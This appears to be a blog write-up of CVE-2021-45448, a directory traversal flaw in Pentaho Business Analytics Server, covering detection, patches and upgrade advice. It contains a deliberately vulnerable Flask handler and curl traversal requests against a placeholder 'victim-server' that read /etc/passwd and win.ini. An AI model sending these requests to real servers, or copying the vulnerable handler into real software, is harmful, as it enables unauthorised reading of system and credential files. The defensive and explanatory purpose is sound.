CVE-2021-45448 significantly impacts older versions of Pentaho Business Analytics Server, specifically those before 9.2.0.2 and 8.3.0.25. Through a flaw in the Pentaho Analyzer plugin, attackers can gain unauthorized access to system files by exploiting a directory traversal vulnerability. This post will break down how the vulnerability works, how to reproduce it, possible exploit code, and what can be done to fix or mitigate the problem.

What is Pentaho?

Pentaho is a popular open-source business intelligence suite that helps organizations analyze and visualize their data. Its Business Analytics Server allows users to manage and create reports from different data sources.

About CVE-2021-45448

CVE ID: CVE-2021-45448  
Severity: High  
Impacted: Pentaho Business Analytics Server < 9.2.0.2 and < 8.3.0.25 with the Analyzer plugin enabled.

- The Analyzer plugin exposes an endpoint that accepts a user-provided file path.
- The server fails to sanitize path elements like ../ (dot-dot-slash), which lets attackers read files outside the intended directory.

Why is This Dangerous?

When the application doesn't properly block inputs like ../, an attacker can craft requests that "climb up" the directory structure and reach files they shouldn't access. This can include configuration files, keys, or even security credentials stored on the server.

How the Vulnerability Occurs

When a client requests a resource via the Analyzer plugin, the application trusts the provided path. For example, instead of only fetching files from /pentaho/resources/templates/, a path like ../../../../etc/passwd can be supplied.

If the application code doesn't block this, the final resolved path becomes /etc/passwd on the server, which is *far* outside the permitted directory.

Below is a simplified Python code snippet that demonstrates the issue:

from flask import Flask, request, send_file
import os

app = Flask(__name__)

@app.route('/get-template')
def get_template():
    base_dir = "/opt/pentaho/resources/templates/"
    filename = request.args.get('filename')
    # BAD: No validation of special elements ('..' or '/')
    file_path = os.path.join(base_dir, filename)
    return send_file(file_path)

The attacker sends:

GET /get-template?filename=../../../../etc/passwd

The server responds with the contents of /etc/passwd.

In Pentaho, the affected endpoint can look like:

https://<pentaho-host>/pentaho/plugin/analyzer/api/templates?path=../../../../etc/passwd

If unpatched, this will return the system’s /etc/passwd file (Linux example).

Here's how the vulnerability could be exploited using curl:

curl "http://victim-server:8080/pentaho/plugin/analyzer/api/templates?path=../../../../etc/passwd"

If successful, the server responds with the contents of /etc/passwd.

*Change the path as needed to target files on Windows servers, such as:*

curl "http://victim-server:8080/pentaho/plugin/analyzer/api/templates?path=..\\..\\..\\..\\windows\\win.ini"
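Because the requests above leave a clear trace in the web server's access log, a defender can check historical logs for traversal attempts against the Analyzer endpoint. The following detection script is an added example, not part of the original post or of Pentaho's code: it parses constructed Tomcat-style access log lines (invented for this example, not real traffic), keeps only requests to the templates endpoint shown above, and flags any path parameter that contains a dot-dot segment after percent-decoding, including the backslash and double-encoded variants. A 200 status on such a request is marked as a likely successful read rather than a mere attempt.

```python
import re
import urllib.parse
from urllib.parse import parse_qs, urlsplit

# The Analyzer endpoint from the request shown in the post.
ANALYZER_TEMPLATES = "/pentaho/plugin/analyzer/api/templates"

# Constructed Tomcat-style access log lines (not real traffic): one benign template
# request, three traversal attempts in different encodings, one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Feb/2022:10:01:02 +0000] "GET /pentaho/plugin/analyzer/api/templates?path=report.html HTTP/1.1" 200 512
10.0.0.9 - - [11/Feb/2022:10:01:07 +0000] "GET /pentaho/plugin/analyzer/api/templates?path=../../../../etc/passwd HTTP/1.1" 200 1843
10.0.0.9 - - [11/Feb/2022:10:01:09 +0000] "GET /pentaho/plugin/analyzer/api/templates?path=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 0
10.0.0.9 - - [11/Feb/2022:10:01:12 +0000] "GET /pentaho/plugin/analyzer/api/templates?path=..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 92
10.0.0.7 - - [11/Feb/2022:10:02:00 +0000] "GET /pentaho/Home HTTP/1.1" 200 7710
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
# A '..' segment bounded by separators (or string ends); applied after decoding and
# after backslashes have been mapped to '/', so it covers ../, ..\ and %2e%2e forms.
DOTDOT_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')


def has_traversal(value):
    """True if a query-string value contains a dot-dot segment in any common encoding."""
    # Decode twice so a double-encoded %252e%252e is still caught.
    decoded = urllib.parse.unquote(urllib.parse.unquote(value))
    return DOTDOT_RE.search(decoded.replace("\\", "/")) is not None


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_traversal_attempts(log_text):
    """Return one record per request to the Analyzer endpoint whose path parameter traverses."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if not parts.path.startswith(ANALYZER_TEMPLATES):
            continue
        # parse_qs already percent-decodes once; has_traversal decodes again.
        for value in parse_qs(parts.query, keep_blank_values=True).get("path", []):
            if has_traversal(value):
                status = int(rec["status"])
                hits.append({
                    "ip": rec["ip"],
                    "time": rec["ts"],
                    "path": value,
                    "status": status,
                    # A 200 on a traversing path means the server served something:
                    # treat it as a likely successful read, not just an attempt.
                    "likely_success": status == 200,
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        flag = "SUCCESS?" if hit["likely_success"] else "blocked"
        print(f'{hit["time"]} {hit["ip"]} status={hit["status"]} {flag} path={hit["path"]!r}')
```

On the constructed sample the script flags the three requests from 10.0.0.9 and nothing else; the 403 entry shows what a patched or firewalled server looks like in the same log. Point `SAMPLE_LOG` at a real access log to reuse the logic as-is.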

References & Further Reading

- NIST NVD entry for CVE-2021-45448
- Pentaho download & changelogs
- Acunetix Directory Traversal writeup

1. Upgrade

The best way to secure your system is to immediately update Pentaho Business Analytics Server to version 9.2.0.2 (or 8.3.0.25 on the 8.3 branch) or later. These versions patch the Analyzer plugin to block directory traversal inputs.

If an upgrade cannot be scheduled immediately, reduce exposure in the meantime by:

- Blocking access to the vulnerable endpoint using firewall rules or web server controls.
- Strictly validating and sanitizing path inputs (e.g., reject any path with .. or /).

Example Patch (Python-style pseudocode)

import os
from flask import abort, request

filename = request.args.get('filename')

# Reject a missing parameter as well as any dot-dot segment or absolute path.
# The leading-backslash check covers the Windows variant shown above.
if not filename or '..' in filename or filename.startswith(('/', '\\')):
    abort(400, description="Invalid filename")

file_path = os.path.join(base_dir, filename)
# Continue safely...
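String filtering for '..' is a useful first line of defence, but the more robust fix is to canonicalise the resolved path and check that it still lies under the allowed directory. The function below is an added example, written for this post and not taken from Pentaho or Flask; the base directory `/opt/pentaho/resources/templates` is the same assumed location as the snippet above, not the product's real path. It goes beyond the literal-'..' check by percent-decoding the value, mapping backslashes to '/', resolving with os.path.realpath and then testing containment, so the Linux, Windows and URL-encoded forms of the traversal are all handled by one rule.

```python
import os
import urllib.parse

# Assumed base directory for this example; the Analyzer plugin's real template
# location is not taken from the product.
BASE_DIR = "/opt/pentaho/resources/templates"


def resolve_template_path(base_dir, user_path):
    """Return the canonical path of user_path inside base_dir, or None if it escapes.

    Rather than only searching for the literal '..', this percent-decodes the value
    (so %2e%2e is seen as ..), treats backslashes as separators (the Windows variant
    of the traversal), canonicalises with os.path.realpath, and finally checks that
    the result is still under base_dir.
    """
    if not user_path:
        return None  # missing or empty parameter: nothing to serve
    decoded = urllib.parse.unquote(user_path)
    # Backslashes are treated as separators so '..\..\' is handled like '../../'.
    normalized = decoded.replace("\\", "/")
    # Drop leading separators: os.path.join discards base_dir when the second
    # argument is absolute, so '/etc/passwd' is anchored under base_dir instead.
    normalized = normalized.lstrip("/")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, normalized))
    # Containment check: the resolved path must be root itself or a descendant of it.
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate


def classify(user_path, base_dir=BASE_DIR):
    """Convenience wrapper returning 'allowed' or 'rejected' for one request value."""
    return "allowed" if resolve_template_path(base_dir, user_path) else "rejected"


if __name__ == "__main__":
    # Constructed request values mirroring the traversal patterns discussed above.
    samples = [
        "report.html",
        "sub/../report.html",
        "../../../../etc/passwd",
        "..\\..\\..\\..\\windows\\win.ini",
        "%2e%2e/%2e%2e/etc/passwd",
        "/etc/passwd",
    ]
    for value in samples:
        print(f"{value!r:45} -> {classify(value)}")
```

Note the two behaviours worth understanding before adopting this: a value like `sub/../report.html` is allowed because it resolves to a file inside the base directory, and an absolute value like `/etc/passwd` is not rejected outright but re-anchored under the base directory, so it can never reach the real system file. In a request handler, a `None` return maps to the same `abort(400)` as in the patch above.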

Conclusion

CVE-2021-45448 is a classic, serious directory traversal vulnerability affecting older, widespread versions of Pentaho Business Analytics Server. Attackers can abuse this to read any file that the Pentaho server user can read. Mitigating this flaw is as simple as updating your Pentaho server or strictly filtering user paths. Take action quickly to keep your organization's data safe!

Share & Spread Awareness

If this helped you, share with other Pentaho admins or IT security teams! For more, check the NVD entry and the official Pentaho release notes.

Timeline

Published on: 11/02/2022 16:15:00 UTC
Last modified on: 11/04/2022 02:48:00 UTC